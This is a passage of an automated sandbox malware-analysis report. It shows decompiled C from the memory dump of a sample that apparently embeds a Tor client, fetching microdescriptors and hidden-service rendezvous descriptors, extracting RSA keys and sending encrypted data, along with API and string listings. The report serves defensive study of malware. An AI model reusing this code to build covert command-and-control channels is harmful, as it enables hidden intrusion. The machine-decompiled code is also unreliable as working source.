    					_t55 = _t55 + 1;
    				} while (_t106 != 0);
    				_t57 = E003A463A(_a4, 0, _a8, _t55 - _t90);
    				_t119 = _t118 + 0xc;
    				if(_t57 == 0) {
    					L7:
    					_t111 = 0;
    				} else {
    					memset(_v8, 0, 0x400);
    					_t120 = _t119 + 0xc;
    					_v12 = _v12 & 0x00000000;
    					while(1) {
    						_t85 = _a4;
    						_t62 = E003A48F6(_a4, 0,  &(_v8[_v12]), 1);
    						_t120 = _t120 + 0xc;
    						if(_t62 == 0) {
    							goto L7;
    						}
    						if(strstr(_v8, 0x3b667c) != 0) {
    							if(strstr(_v8, "200 OK") == 0) {
    								goto L7;
    							} else {
    								if(strstr(_v8, "Content-Encoding: deflate") == 0) {
    									_t112 = "Content-Length: ";
    									if(strstr(_v8, _t112) == 0) {
    										goto L7;
    									} else {
    										_v12 = _v12 & 0x00000000;
    										sscanf( &((strstr(_v8, _t112))[0x10]), "%d\r\n",  &_v12);
    										if(_v12 == 0) {
    											goto L7;
    										} else {
    											_t113 = _a12;
    											if(E003A48F6(_t85, 0, _t113, _v12) == 0) {
    												goto L7;
    											} else {
    												 *((char*)(_v12 + _t113)) = 0;
    												goto L26;
    											}
    										}
    									}
    								} else {
    									memset( &_v72, 0, 0x38);
    									_v72 = _v16;
    									_v68 = 0;
    									_v60 = _a12;
    									_v56 = 0x400000;
    									E003A2307( &_v72);
    									_t87 = _a4;
    									_t77 = E003A48F6(_a4, 0, _v16, 1);
    									_t123 = _t120 + 0x18;
    									while(_t77 != 0) {
    										if(_v68 == 0) {
    											_v72 = _v16;
    											_v68 = 1;
    										}
    										_t78 = E003A238B( &_v72);
    										if(_t78 == 1) {
    											L21:
    											 *((char*)(_v52 + _a12)) = 0;
    											E003A255C( &_v72);
    											L26:
    											_t111 = 1;
    										} else {
    											if(_t78 != 0) {
    												E003A255C( &_v72);
    												goto L7;
    											} else {
    												_t82 = _a16;
    												if(_t82 == 0 || _v64 < _t82) {
    													_t77 = E003A48F6(_t87, 0, _v16, 1);
    													_t123 = _t123 + 0xc;
    													continue;
    												} else {
    													goto L21;
    												}
    											}
    										}
    										goto L27;
    									}
    									goto L7;
    								}
    							}
    						} else {
    							_v12 = _v12 + 1;
    							if(_v12 < 0x400) {
    								continue;
    							} else {
    								goto L7;
    							}
    						}
    						goto L27;
    					}
    					goto L7;
    				}
    				L27:
    				 *0x3b8540(_v16);
    				 *0x3b8540(_v8);
    				return _t111;
    			}
































    APIs
      • Part of subcall function 003A463A: memset.MSVCRT ref: 003A46EE
      • Part of subcall function 003A463A: htons.WS2_32(?), ref: 003A4701
      • Part of subcall function 003A463A: htons.WS2_32( L:), ref: 003A472A
      • Part of subcall function 003A463A: memcpy.MSVCRT ref: 003A473E
      • Part of subcall function 003A463A: memset.MSVCRT ref: 003A481C
      • Part of subcall function 003A463A: memset.MSVCRT ref: 003A4845
      • Part of subcall function 003A463A: htons.WS2_32(?), ref: 003A487F
    • memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4939
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4955
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4964
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A497C
      • Part of subcall function 003A48F6: htons.WS2_32(?), ref: 003A4B37
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4B5F
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4B75
      • Part of subcall function 003A48F6: memcpy.MSVCRT ref: 003A4B9A
    • strstr.MSVCRT ref: 003A4C61
    • strstr.MSVCRT ref: 003A4C80
    • strstr.MSVCRT ref: 003A4C90
    • memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A238B: memcpy.MSVCRT ref: 003A2415
      • Part of subcall function 003A238B: memcpy.MSVCRT ref: 003A24E1
    • strstr.MSVCRT ref: 003A4D4B
    • strstr.MSVCRT ref: 003A4D68
    • sscanf.MSVCRT ref: 003A4D70
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 46%
    			E003A556B(void* __ecx, void* __edi, void* __eflags) {
    				char* _v8;
    				void* _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr _v32;
    				char _v36;
    				char _v860;
    				void* __ebx;
    				void* __esi;
    				void* _t28;
    				char _t31;
    				void* _t33;
    				char _t40;
    				char* _t41;
    				char* _t48;
    				void* _t51;
    				void* _t62;
    				char* _t79;
    				void* _t86;
    
    				_t86 = __eflags;
    				_t28 = E003A3E45(__ecx);
    				E003A3E17( &_v860);
    				_t31 = L003AF529(_t86, _t28);
    				_pop(_t62);
    				_v860 = _t31;
    				_t87 = _t31;
    				if(_t31 == 0) {
    					L8:
    					return 0;
    				}
    				_t33 = E003A4054( &_v860, _t87);
    				_t88 = _t33;
    				if(_t33 == 0 || E003A3EE9( &_v860, _t62, _t88) == 0) {
    					L7:
    					E003AFF10(_v860);
    					goto L8;
    				} else {
    					_v20 = 0x10;
    					__imp__#5( *_v860,  &_v36,  &_v20);
    					_t40 =  *0x3b8538(0x200);
    					_v12 = _t40;
    					_t41 =  *0x3b8538(0x1000);
    					_v8 = _t41;
    					__imp__#12(_v32);
    					_t12 =  &_v12; // 0x3a5e6d
    					sprintf( *_t12, "GET /tor/micro/d/%s.z HTTP/1.0\r\nHost: %s\r\n\r\n", __edi + 0x2c, _t41);
    					if(E003A4BDF( &_v860, _v12, _v8, 0) == 0) {
    						L6:
    						 *0x3b8540(_v8);
    						 *0x3b8540(_v12);
    						goto L7;
    					}
    					_t48 = strstr(_v8, "-----BEGIN RSA PUBLIC KEY-----");
    					_v16 = _t48;
    					if(_t48 == 0) {
    						goto L6;
    					}
    					_t79 =  &((strstr( &(_t48[1]), "-----END RSA PUBLIC KEY-----"))[0x1c]);
    					if(_t79 != 0) {
    						_t51 =  *0x3b8538(0x1000);
    						 *(__edi + 0x6c) = _t51;
    						memset(_t51, 0, 0x1000);
    						memcpy( *(__edi + 0x6c), _v16, _t79 - _v16);
    						 *0x3b8540(_v8);
    						 *0x3b8540(_v12);
    						E003AFF10(_v860);
    						__eflags = 1;
    						return 1;
    					}
    					goto L6;
    				}
    			}

    APIs
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A40B3
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4122
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4165
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A4054: htonl.WS2_32(00000000), ref: 003A41C5
      • Part of subcall function 003A4054: getpeername.WS2_32(?,?,?), ref: 003A41EA
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A4226
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4233
    • getpeername.WS2_32(?,?,?), ref: 003A55D6
    • inet_ntoa.WS2_32(?), ref: 003A55FE
    • sprintf.MSVCRT ref: 003A5611
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C61
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C80
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C90
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D4B
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D68
      • Part of subcall function 003A4BDF: sscanf.MSVCRT ref: 003A4D70
    • strstr.MSVCRT ref: 003A5640
    • strstr.MSVCRT ref: 003A5652
      • Part of subcall function 003AFF10: closesocket.WS2_32(?), ref: 003AFF12
    • memset.MSVCRT ref: 003A568F
    • memcpy.MSVCRT ref: 003A56A1
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F19
      • Part of subcall function 003A3EE9: htons.WS2_32(00000000), ref: 003A3F31
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3EE9: htons.WS2_32(?), ref: 003A3FB2
    Strings
    • m^:, xrefs: 003A560E
    • -----END RSA PUBLIC KEY-----, xrefs: 003A564C
    • GET /tor/micro/d/%s.z HTTP/1.0Host: %s, xrefs: 003A5609
    • -----BEGIN RSA PUBLIC KEY-----, xrefs: 003A5638
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 32%
    			E003A463A(intOrPtr* __ebx, void* _a4, void* _a8, signed int _a12) {
    				void* _v8;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				void _v56;
    				void _v172;
    				intOrPtr _t99;
    				void* _t103;
    				void* _t104;
    				signed int _t106;
    				signed int _t107;
    				void* _t125;
    				signed int _t128;
    				void* _t129;
    				signed int _t132;
    				signed int _t133;
    				void* _t140;
    				void* _t144;
    				intOrPtr* _t148;
    				signed int _t156;
    				signed int* _t163;
    				signed int _t164;
    				signed int _t166;
    				signed int _t170;
    				void* _t178;
    				void* _t185;
    				intOrPtr _t192;
    				void* _t194;
    				void* _t195;
    				int _t196;
    				void* _t198;
    				void* _t200;
    				void* _t201;
    				void* _t202;
    				void* _t204;
    				void* _t205;
    				void* _t206;
    				void* _t207;
    
    				_t148 = __ebx;
    				_t178 =  *0x3b8538(0x200);
    				_v16 = _t178;
    				_v8 =  *0x3b8538(0x200);
    				_v24 = _v24 & 0x00000000;
    				_v32 = _v32 & 0x00000000;
    				_t99 = _a12 / 0x1f2 + 1;
    				_v36 = _t99;
    				if(_t99 == 0) {
    					L24:
    					 *0x3b8540(_t178);
    					 *0x3b8540(_v8);
    					_t103 = 1;
    				} else {
    					_t104 = _a8;
    					_v28 = 0x1f2;
    					_v28 = _v28 - _t104;
    					_v20 = _t104;
    					do {
    						_t19 =  &_a4; // 0x3a4c20
    						_t192 =  *_t19;
    						if(_t192 == 0) {
    							L9:
    							memset(_t178, 0, 0x1fd);
    							 *_t178 = 2;
    							_t106 =  *(_t148 + 0x138) & 0x0000ffff;
    							_t201 = _t200 + 0xc;
    							__imp__#9(_t106);
    							 *(_t178 + 3) = _t106;
    							_t107 = _a12;
    							if(_v20 + _v28 >= _t107) {
    								_t107 = _t107 - _v24;
    								_v12 = _t107;
    							} else {
    								_v12 = 0x1f2;
    							}
    							_t38 =  &_v12; // 0x3a4c20
    							__imp__#9( *_t38);
    							 *(_t178 + 9) = _t107;
    							_t42 = _t178 + 0xb; // 0xb
    							memcpy(_t42, _v20, _v12);
    							_t202 = _t201 + 0xc;
    							_push(0x1fd);
    							_push(_t178);
    							if(_a4 == 0) {
    								 *0x3b899c(_t148 + 8);
    								_t194 = _t148 + 8;
    							} else {
    								 *0x3b899c(_a4);
    								_t194 = _a4;
    							}
    							_t156 = 0x1d;
    							memcpy( &_v172, _t194, _t156 << 2);
    							_t195 =  *0x3b8538(0x14);
    							_v12 = _t195;
    							 *0x3b8ab0( &_v172, _t195);
    							memcpy( &_v56, _t195, 0 << 2);
    							_t204 = _t202 + 0x18;
    							 *0x3b8540(_v12, 5);
    							_t185 = _a4;
    							_t118 = _v16;
    							 *((intOrPtr*)(_v16 + 5)) = _v56;
    							if(_t185 == 0) {
    								_t196 = 0x200;
    								memset(_v8, 0, 0x200);
    								_t125 = E003A3BB7(_t148 + 0xf0, _v16, 0x1fd, _v8 + 3, _t148 + 0x110, _t148 + 0x120);
    								_t205 = _t204 + 0x24;
    								if(_t125 == 0) {
    									goto L26;
    								} else {
    									goto L20;
    								}
    							} else {
    								_t59 = _t185 + 0x118; // 0x118
    								_t60 = _t185 + 0x108; // 0x108
    								_t140 = E003A3BB7(_t185 + 0xe8, _t118, 0x1fd, _v8, _t60, _t59);
    								_t206 = _t204 + 0x18;
    								if(_t140 == 0) {
    									L26:
    									_t178 = _v16;
    									goto L27;
    								} else {
    									_t144 = E003A3BB7(_t148 + 0xf0, _v8, 0x1fd, _v16, _t148 + 0x110, _t148 + 0x120);
    									_t207 = _t206 + 0x18;
    									if(_t144 == 0) {
    										goto L26;
    									} else {
    										_t198 = _v8;
    										memset(_t198, 0, 0x200);
    										_t170 = 0x7f;
    										memcpy(_t198 + 3, _v16, _t170 << 2);
    										_t205 = _t207 + 0x18;
    										asm("movsb");
    										_t185 = _a4;
    										_t196 = 0x200;
    										L20:
    										_t128 =  *(_t148 + 4) & 0x0000ffff;
    										__imp__#9(_t128);
    										_t163 = _v8;
    										 *_t163 = _t128;
    										_t163[0] = 3;
    										_t129 = E003AFD0B( *_t148, _t163, _t196);
    										_t200 = _t205 + 0xc;
    										if(_t129 != _t196) {
    											goto L26;
    										} else {
    											goto L21;
    										}
    									}
    								}
    							}
    						} else {
    							_t132 =  *(_t192 + 0x134);
    							if(_t132 < 0x3e8) {
    								L6:
    								_t133 =  *(_t192 + 0x134);
    								if(_t133 < 0x1f4) {
    									goto L9;
    								} else {
    									_t164 = 0x32;
    									if(_t133 % _t164 != 0 || E003A4573(_t148, _t192) != 0) {
    										goto L9;
    									} else {
    										goto L27;
    									}
    								}
    							} else {
    								_t166 = 0x64;
    								if(_t132 % _t166 != 0 || E003A4573(_t148, _t192) != 0) {
    									goto L6;
    								} else {
    									L27:
    									 *0x3b8540(_t178);
    									 *0x3b8540(_v8);
    									_t103 = 0;
    								}
    							}
    						}
    						goto L25;
    						L21:
    						_v24 = _v24 + 0x1f2;
    						_v20 = _v20 + 0x1f2;
    						if(_t185 != 0) {
    							 *((intOrPtr*)(_t185 + 0x134)) =  *((intOrPtr*)(_t185 + 0x134)) + 1;
    						}
    						_v32 = _v32 + 1;
    						_t178 = _v16;
    					} while (_v32 < _v36);
    					goto L24;
    				}
    				L25:
    				return _t103;
    			}

    APIs
    • memset.MSVCRT ref: 003A46EE
    • htons.WS2_32(?), ref: 003A4701
    • htons.WS2_32( L:), ref: 003A472A
    • memcpy.MSVCRT ref: 003A473E
    • memset.MSVCRT ref: 003A481C
    • memset.MSVCRT ref: 003A4845
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A487F
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 43%
    			E003A5C47(void* __edx, void* __eflags, intOrPtr _a4) {
    				char _v504;
    				char _v512;
    				char _v532;
    				int _v1364;
    				void* _v2164;
    				char _v2180;
    				char _v2284;
    				intOrPtr _v2316;
    				void _v2400;
    				void _v2420;
    				char _v2424;
    				char _v2440;
    				char _v2456;
    				intOrPtr _v2460;
    				void _v2488;
    				char _v2496;
    				void _v2508;
    				intOrPtr _v2516;
    				char _v2528;
    				char _v2532;
    				intOrPtr _v2540;
    				char _v2544;
    				void _v2552;
    				void* _v2556;
    				signed int _v2560;
    				intOrPtr _v2564;
    				char* _v2568;
    				void* _v2572;
    				char* _v2576;
    				intOrPtr _v2580;
    				void* _v2584;
    				signed int _v2588;
    				void* _v2592;
    				void* _v2596;
    				char _v2600;
    				intOrPtr _v2604;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t129;
    				signed int _t132;
    				intOrPtr _t133;
    				intOrPtr _t134;
    				void* _t135;
    				char* _t136;
    				void* _t150;
    				void* _t156;
    				char _t160;
    				void* _t161;
    				intOrPtr* _t167;
    				int _t171;
    				int _t175;
    				signed int _t176;
    				int _t188;
    				int _t189;
    				int _t194;
    				int _t195;
    				void* _t197;
    				intOrPtr _t203;
    				int _t207;
    				int _t213;
    				int _t222;
    				int _t226;
    				int _t232;
    				int _t234;
    				void* _t245;
    				void* _t249;
    				void* _t251;
    				void* _t257;
    				void* _t271;
    				signed int _t272;
    				void* _t278;
    				void* _t279;
    				void* _t281;
    				signed int _t285;
    				signed int _t288;
    				int _t310;
    				signed int _t312;
    				void* _t313;
    				intOrPtr _t318;
    				int _t323;
    				char* _t337;
    				void* _t338;
    				intOrPtr _t342;
    				intOrPtr* _t347;
    				int _t349;
    				int _t350;
    				int _t353;
    				intOrPtr* _t358;
    				signed int _t359;
    				void* _t362;
    				void* _t363;
    				void* _t364;
    				void* _t365;
    				void* _t366;
    
    				_t129 =  *0x3b8538(0x470, _t313, _t338, _t245);
    				_v2572 = _t129;
    				memset(_t129, 0, 0x470);
    				_t362 = (_t359 & 0xfffffff8) - 0xa14 + 0xc;
    				_v2552 =  *0x3b8538(0x200);
    				_v2600 = 0x10000;
    				_t132 =  *0x3b8538();
    				_v2560 = _t132;
    				_t133 =  *0x3b8538(0x1000);
    				_v2580 = _t133;
    				_t134 =  *0x3b8538(0x1000);
    				_v2540 = _t134;
    				_t135 =  *0x3b8538(0x28);
    				_v2556 = _t135;
    				_t136 =  *0x3b8538();
    				_t257 = 0x80;
    				_v2568 = _t136;
    				if(E003A50D5(_a4,  &_v2440, E003AE937(_t257) & 1) == 0 || E003A39C0( &_v2528,  &_v2440) != 0x14) {
    					L33:
    					 *0x3b8540(_v2556);
    					 *0x3b8540(_v2568);
    					 *0x3b8540(_v2560);
    					 *0x3b8540(_v2552);
    					 *0x3b8540(_v2540);
    					 *0x3b8540(_v2580);
    					 *0x3b8540(_v2572);
    					_t150 = 0;
    				} else {
    					_t156 = E003A51F8( &_v2284,  &_v2528);
    					_t379 = _t156;
    					if(_t156 == 0) {
    						goto L33;
    					} else {
    						E003A3E17( &_v2164);
    						_t160 = L003AF529(_t379,  &_v2284);
    						_pop(_t271);
    						_v2164 = _t160;
    						_t380 = _t160;
    						if(_t160 == 0) {
    							goto L33;
    						} else {
    							_t161 = E003A4054( &_v2164, _t380);
    							_t381 = _t161;
    							if(_t161 == 0 || E003A3EE9( &_v2164, _t271, _t381) == 0) {
    								_t342 = _v2164;
    								goto L8;
    							} else {
    								_t167 = _v2164;
    								_v2532 = 0x10;
    								__imp__#5( *_t167,  &_v2508,  &_v2532);
    								__imp__#12(_v2516);
    								sprintf(_v2568, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\n\r\n",  &_v2456, _t167);
    								_t171 = E003A4BDF( &_v2180, _v2568, _v2576, 0);
    								_t342 = _v2180;
    								_t363 = _t362 + 0x20;
    								__eflags = _t171;
    								if(_t171 != 0) {
    									E003AFF10(_t342);
    									_t175 = E003A528D( &_v532,  &_v2560, _v2576);
    									_t364 = _t363 + 0xc;
    									__eflags = _t175;
    									if(_t175 == 0) {
    										goto L33;
    									} else {
    										_t176 = E003AE937(_t271);
    										_t272 = 8;
    										_t310 = _t176 % _v2560 << 5;
    										__eflags = _t310;
    										memcpy( &_v2488, _t364 + _t310 + 0x820, _t272 << 2);
    										_t365 = _t364 + 0xc;
    										_t318 =  *0x3b8ac0; // 0x0
    										do {
    											_t312 = E003AE937(0) %  *0x3b8ac4;
    											__eflags =  *((intOrPtr*)(_t312 * 0x74 + _t318 + 0x70)) - 1;
    										} while (__eflags != 0);
    										_push(0x1d);
    										memcpy( &_v2420, _t312 * 0x74 + _t318, 0 << 2);
    										_t366 = _t365 + 0xc;
    										__eflags = E003A556B(0,  &_v2420, __eflags);
    										if(__eflags == 0) {
    											L30:
    											_t323 = _v2560;
    											__eflags = _t323;
    											if(_t323 > 0) {
    												_t347 =  &_v504;
    												do {
    													 *0x3b8540( *((intOrPtr*)(_t347 - 4)));
    													 *0x3b8540( *_t347);
    													_t347 = _t347 + 0x20;
    													_t323 = _t323 - 1;
    													__eflags = _t323;
    												} while (_t323 != 0);
    											}
    											goto L33;
    										} else {
    											_t188 = L003AF529(__eflags,  &_v2420);
    											_t324 = _v2588;
    											_pop(_t278);
    											 *_v2588 = _t188;
    											__eflags = _t188;
    											if(__eflags == 0) {
    												goto L30;
    											} else {
    												_t189 = E003A4054(_t324, __eflags);
    												__eflags = _t189;
    												if(_t189 == 0) {
    													L29:
    													E003AFF10( *_t324);
    													goto L30;
    												} else {
    													_t349 = 0;
    													__eflags = 0;
    													do {
    														 *((char*)(_t366 + _t349 + 0x44)) = E003AE8E0();
    														_t349 = _t349 + 1;
    														__eflags = _t349 - 0x14;
    													} while (__eflags < 0);
    													_t194 = E003A56CF(_t324, _t278, __eflags,  &_v2544);
    													_pop(_t279);
    													__eflags = _t194;
    													if(__eflags == 0) {
    														goto L29;
    													} else {
    														_t195 = E003AF29F(_t279, __eflags, _v2572, _v2584);
    														_pop(_t281);
    														__eflags = _t195;
    														if(_t195 == 0) {
    															goto L29;
    														} else {
    															_t249 = _v2556;
    															_t350 = E003A5853(_t281, _v2460, _t249);
    															_v2552 = _t350;
    															__eflags = _t350;
    															if(__eflags == 0) {
    																goto L29;
    															} else {
    																_t197 =  *0x3b8538(_t350);
    																_v2592 = _t197;
    																memcpy(_t197, _t249, _t350);
    																E003A3B5C(_v2592, _t350,  &_v2508);
    																_t285 = 5;
    																memcpy(_v2596,  &_v2508, _t285 << 2);
    																 *_t249 = 3;
    																_t203 = E003A3B23(__eflags) + 0x96;
    																__imp__#8(_t203);
    																 *((intOrPtr*)(_t249 + 2)) = _t203;
    																_t207 = E003AEA68( &_v2424,  &_v2568,  &_v2584);
    																__eflags = _t207;
    																if(_t207 == 0) {
    																	L28:
    																	 *0x3b8540(_v2596);
    																	_t324 = _v2592;
    																	goto L29;
    																} else {
    																	 *((intOrPtr*)(_t249 + 6)) = _v2568;
    																	 *((short*)(_t249 + 0xa)) = _v2584;
    																	_t288 = 5;
    																	memcpy(_t249 + 0xc,  &_v2400, _t288 << 2);
    																	_t213 = E003A5853(0, _v2316, _t249 + 0x22);
    																	_t353 = _t213;
    																	_v2568 = _t353;
    																	__eflags = _t353;
    																	if(_t353 == 0) {
    																		goto L28;
    																	} else {
    																		__imp__#9(_t353);
    																		 *(_t249 + 0x20) = _t213;
    																		_push(5);
    																		_v2588 = _v2588 & 0x00000000;
    																		_t85 = _t249 + _t353 + 0x22; // 0x22
    																		_push(0x20);
    																		_t89 = memcpy(_t85,  &_v2552, 0 << 2) + 0x36; // 0x36
    																		memcpy(_t89, _v2592, 0 << 2);
    																		_t222 = E003A588E(_t249, _v2572 + 0xb6, _v2600, _v2560, _v2604 + 0x14,  &_v2588);
    																		__eflags = _t222;
    																		if(_t222 == 0) {
    																			goto L28;
    																		} else {
    																			E003A3E17( &_v1364);
    																			_t226 = L003AF529(__eflags,  &_v2496);
    																			_v1364 = _t226;
    																			__eflags = _t226;
    																			if(__eflags == 0) {
    																				goto L28;
    																			} else {
    																				__eflags = E003A4054( &_v1364, __eflags);
    																				if(__eflags == 0) {
    																					L27:
    																					E003AFF10(_v1364);
    																					goto L28;
    																				} else {
    																					_t232 = E003A5949( &_v1364, __eflags, _v2604, _v2588 + 0x14);
    																					__eflags = _t232;
    																					if(_t232 == 0) {
    																						goto L27;
    																					} else {
    																						_t251 = _v2596;
    																						_t234 = E003A5AAA(_t251, _v2580, _t251 + 0x338);
    																						__eflags = _t234;
    																						if(_t234 != 0) {
    																							E003AFF10(_v1364);
    																							 *0x3b8540(_v2600);
    																							_t337 = _v2568;
    																							__eflags = _t337;
    																							if(_t337 > 0) {
    																								_t358 =  &_v512;
    																								do {
    																									 *0x3b8540( *((intOrPtr*)(_t358 - 4)));
    																									 *0x3b8540( *_t358);
    																									_t358 = _t358 + 0x20;
    																									_t337 = _t337 - 1;
    																									__eflags = _t337;
    																								} while (_t337 != 0);
    																							}
    																							 *0x3b8540(_v2580);
    																							 *0x3b8540(_v2592);
    																							 *0x3b8540(_v2584);
    																							 *0x3b8540(_v2576);
    																							 *0x3b8540(_v2564);
    																							 *0x3b8540(_v2604);
    																							_t150 = _t251;
    																						} else {
    																							goto L27;
    																						}
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								} else {
    									L8:
    									E003AFF10(_t342);
    									goto L33;
    								}
    							}
    						}
    					}
    				}
    				return _t150;
    			}

    APIs
    • memset.MSVCRT ref: 003A5C6B
      • Part of subcall function 003A50D5: htonl.WS2_32(?), ref: 003A513C
      • Part of subcall function 003A39C0: memset.MSVCRT ref: 003A39EE
    • getpeername.WS2_32(?), ref: 003A5D94
    • inet_ntoa.WS2_32(?), ref: 003A5D9E
    • sprintf.MSVCRT ref: 003A5DB6
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C61
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C80
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C90
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D4B
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D68
      • Part of subcall function 003A4BDF: sscanf.MSVCRT ref: 003A4D70
      • Part of subcall function 003AFF10: closesocket.WS2_32(?), ref: 003AFF12
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A40B3
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4122
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4165
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A4054: htonl.WS2_32(00000000), ref: 003A41C5
      • Part of subcall function 003A4054: getpeername.WS2_32(?,?,?), ref: 003A41EA
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A4226
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4233
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F19
      • Part of subcall function 003A3EE9: htons.WS2_32(00000000), ref: 003A3F31
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3EE9: htons.WS2_32(?), ref: 003A3FB2
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A52A3
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A52B8
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A52C4
      • Part of subcall function 003A528D: memcpy.MSVCRT ref: 003A52F9
      • Part of subcall function 003A528D: memset.MSVCRT ref: 003A5319
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A5343
      • Part of subcall function 003A528D: strstr.MSVCRT ref: 003A536D
      • Part of subcall function 003A528D: memset.MSVCRT ref: 003A538C
      • Part of subcall function 003A528D: memcpy.MSVCRT ref: 003A53A3
      • Part of subcall function 003A528D: strtok.MSVCRT ref: 003A5444
      • Part of subcall function 003A528D: strtok.MSVCRT ref: 003A544C
      • Part of subcall function 003A528D: sscanf.MSVCRT ref: 003A5468
      • Part of subcall function 003A528D: sscanf.MSVCRT ref: 003A5485
      • Part of subcall function 003A528D: strtok.MSVCRT ref: 003A54E6
      • Part of subcall function 003A556B: getpeername.WS2_32(?,?,?), ref: 003A55D6
      • Part of subcall function 003A556B: inet_ntoa.WS2_32(?), ref: 003A55FE
      • Part of subcall function 003A556B: sprintf.MSVCRT ref: 003A5611
      • Part of subcall function 003A556B: strstr.MSVCRT ref: 003A5640
      • Part of subcall function 003A556B: strstr.MSVCRT ref: 003A5652
      • Part of subcall function 003A556B: memset.MSVCRT ref: 003A568F
